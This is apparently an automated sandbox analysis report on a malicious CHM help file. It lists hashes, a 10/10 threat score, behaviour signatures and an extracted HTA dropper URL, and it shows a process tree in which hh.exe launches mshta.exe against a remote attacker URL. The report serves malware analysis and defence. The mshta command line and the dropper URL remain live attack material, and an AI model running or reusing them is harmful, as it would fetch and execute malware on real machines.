Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/09/2024, 15:11

General

  • Target

    b73ee977154402f8eecc5a446baf0dba456a37d1ca9348858540a8d048f3fd37.chm

  • Size

    41KB

  • MD5

    e557693cc879beeb1a455cac02724ea7

  • SHA1

    448723380110d37364d3c960cd8191130ca96aa7

  • SHA256

    b73ee977154402f8eecc5a446baf0dba456a37d1ca9348858540a8d048f3fd37

  • SHA512

    448f302a5aff395472c4ec52cdd11a69d4a93c1caba580e373b1e8b2413c5bc35be2e8757c9e77231d257dd94362cdc7e39be857b536410cc178fdae9afa6426

  • SSDEEP

    768:vdz7GiZkaVmCsjBnqE9c2E8ouJEjg7J0BY25K4zhGmGc8:vlvqlnvI83GjgF0+IBz4vD

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://attiferstudio.com/install.bak/sony/8.html

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\b73ee977154402f8eecc5a446baf0dba456a37d1ca9348858540a8d048f3fd37.chm
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3448
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/8.html ,
      2⤵
      • Blocklisted process makes network request
      PID:1740

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads